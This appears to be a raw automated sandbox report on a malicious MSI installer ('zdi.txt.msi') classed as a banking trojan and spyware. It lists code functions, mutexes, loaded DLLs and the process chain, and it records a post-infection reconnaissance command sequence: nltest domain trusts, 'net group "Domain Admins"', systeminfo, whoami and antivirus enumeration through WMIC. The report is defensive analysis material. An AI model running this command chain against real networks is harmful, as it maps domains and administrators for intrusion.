Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8E22D4	5_2_00007FFDFA8E22D4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CC3A8	5_2_00007FFDFA8CC3A8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8D50F8	5_2_00007FFDFA8D50F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B70EC	5_2_00007FFDFA8B70EC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B61E0	5_2_00007FFDFA8B61E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8DC180	5_2_00007FFDFA8DC180
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA9801A4	5_2_00007FFDFA9801A4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CD698	5_2_00007FFDFA8CD698
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97D670	5_2_00007FFDFA97D670
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B7680	5_2_00007FFDFA8B7680
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AA83C	5_2_00007FFDFA8AA83C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA995834	5_2_00007FFDFA995834
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA969470	5_2_00007FFDFA969470
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8FD604	5_2_00007FFDFA8FD604
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8BB560	5_2_00007FFDFA8BB560
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA489500	5_2_0000023CDA489500
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49A100	5_2_0000023CDA49A100
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA499120	5_2_0000023CDA499120
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49B4E0	5_2_0000023CDA49B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA494DB0	5_2_0000023CDA494DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A4550	5_2_0000023CDA4A4550
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA485D60	5_2_0000023CDA485D60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B0210	5_2_0000023CDA4B0210
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A7220	5_2_0000023CDA4A7220
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4955C0	5_2_0000023CDA4955C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4899D0	5_2_0000023CDA4899D0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4AB5E0	5_2_0000023CDA4AB5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A55E0	5_2_0000023CDA4A55E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4916A0	5_2_0000023CDA4916A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4942A0	5_2_0000023CDA4942A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A82A0	5_2_0000023CDA4A82A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA48A730	5_2_0000023CDA48A730
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4866C0	5_2_0000023CDA4866C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49BED0	5_2_0000023CDA49BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A66E0	5_2_0000023CDA4A66E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A13A3	5_2_0000023CDA4A13A3
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A2BB0	5_2_0000023CDA4A2BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B1F40	5_2_0000023CDA4B1F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B2F60	5_2_0000023CDA4B2F60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B2812	5_2_0000023CDA4B2812
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4AFBC0	5_2_0000023CDA4AFBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49CBE0	5_2_0000023CDA49CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B1490	5_2_0000023CDA4B1490
Source: C:\Windows\explorer.exe	Code function: 9_2_01372164	9_2_01372164
Source: C:\Windows\explorer.exe	Code function: 9_2_01371A7C	9_2_01371A7C
Source: C:\Windows\explorer.exe	Code function: 9_2_01371A8C	9_2_01371A8C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D4B50	9_2_0B8D4B50
Source: C:\Windows\explorer.exe	Code function: 9_2_0B969708	9_2_0B969708
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91BB94	9_2_0B91BB94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B96EBB8	9_2_0B96EBB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95DB34	9_2_0B95DB34
Source: C:\Windows\explorer.exe	Code function: 9_2_0B952B38	9_2_0B952B38
Source: C:\Windows\explorer.exe	Code function: 9_2_0B940B54	9_2_0B940B54
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91EA84	9_2_0B91EA84
Source: C:\Windows\explorer.exe	Code function: 9_2_0B900A8A	9_2_0B900A8A
Source: C:\Windows\explorer.exe	Code function: 9_2_0B948980	9_2_0B948980
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DD9E4	9_2_0B8DD9E4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B964940	9_2_0B964940
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9498B0	9_2_0B9498B0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95D8B8	9_2_0B95D8B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92481C	9_2_0B92481C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90D834	9_2_0B90D834
Source: C:\Windows\explorer.exe	Code function: 9_2_0B908824	9_2_0B908824
Source: C:\Windows\explorer.exe	Code function: 9_2_0B937874	9_2_0B937874
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D7FD0	9_2_0B8D7FD0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B94AF20	9_2_0B94AF20
Source: C:\Windows\explorer.exe	Code function: 9_2_0B919F68	9_2_0B919F68
Source: C:\Windows\explorer.exe	Code function: 9_2_0B96AE84	9_2_0B96AE84
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DBEB8	9_2_0B8DBEB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B960EC0	9_2_0B960EC0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B931ECC	9_2_0B931ECC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B927EE8	9_2_0B927EE8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8EFE38	9_2_0B8EFE38
Source: C:\Windows\explorer.exe	Code function: 9_2_0B969D94	9_2_0B969D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F9D94	9_2_0B8F9D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B928DF8	9_2_0B928DF8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90EDE0	9_2_0B90EDE0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B900D18	9_2_0B900D18
Source: C:\Windows\explorer.exe	Code function: 9_2_0B945D68	9_2_0B945D68
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D9CBC	9_2_0B8D9CBC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B937C14	9_2_0B937C14
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8FFC72	9_2_0B8FFC72
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9473A0	9_2_0B9473A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9183EC	9_2_0B9183EC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DE31C	9_2_0B8DE31C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6358	9_2_0B8D6358
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95B370	9_2_0B95B370
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8ED19C	9_2_0B8ED19C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92318C	9_2_0B92318C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9051C0	9_2_0B9051C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9311CC	9_2_0B9311CC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9001FB	9_2_0B9001FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0B930114	9_2_0B930114
Source: C:\Windows\explorer.exe	Code function: 9_2_0B944134	9_2_0B944134
Source: C:\Windows\explorer.exe	Code function: 9_2_0B940154	9_2_0B940154
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9170C0	9_2_0B9170C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92F018	9_2_0B92F018
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F6038	9_2_0B8F6038
Source: C:\Windows\explorer.exe	Code function: 9_2_0B93A048	9_2_0B93A048
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90E074	9_2_0B90E074
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6078	9_2_0B8D6078
Source: C:\Windows\explorer.exe	Code function: 9_2_0B938788	9_2_0B938788
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8E77E0	9_2_0B8E77E0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B94672C	9_2_0B94672C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F5768	9_2_0B8F5768
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95D63C	9_2_0B95D63C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F9650	9_2_0B8F9650
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9005A0	9_2_0B9005A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91B5D0	9_2_0B91B5D0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9305FC	9_2_0B9305FC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8FF5FB	9_2_0B8FF5FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0B945534	9_2_0B945534
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D453C	9_2_0B8D453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F0540	9_2_0B8F0540
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D8568	9_2_0B8D8568
Source: C:\Windows\explorer.exe	Code function: 9_2_0B934564	9_2_0B934564
Source: C:\Windows\explorer.exe	Code function: 9_2_0B933498	9_2_0B933498
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9384D8	9_2_0B9384D8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91F4C4	9_2_0B91F4C4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9594F0	9_2_0B9594F0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B942430	9_2_0B942430
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92E45C	9_2_0B92E45C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B927448	9_2_0B927448

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA979670 appears 61 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BECA0 appears 298 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BC6C0 appears 198 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA979868 appears 296 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BF210 appears 62 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DD6E8 appears 52 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DE160 appears 147 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DD5A8 appears 35 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8F7D54 appears 31 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C3325F appears 103 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C33790 appears 39 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C33292 appears 66 times

Source: zdi.txt.msi	Binary or memory string: OriginalFilenameviewer.exeF vs zdi.txt.msi
Source: zdi.txt.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs zdi.txt.msi

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winMSI@69/30@4/3

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C13860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

3_2_00C13860

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C14BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

3_2_00C14BA0

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C145B0 LoadResource,LockResource,SizeofResource,

3_2_00C145B0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML4871.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFCEF614FEBAB0279B.TMP

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump

Source: ucsafe64.tmp.9.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\zdi.txt.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
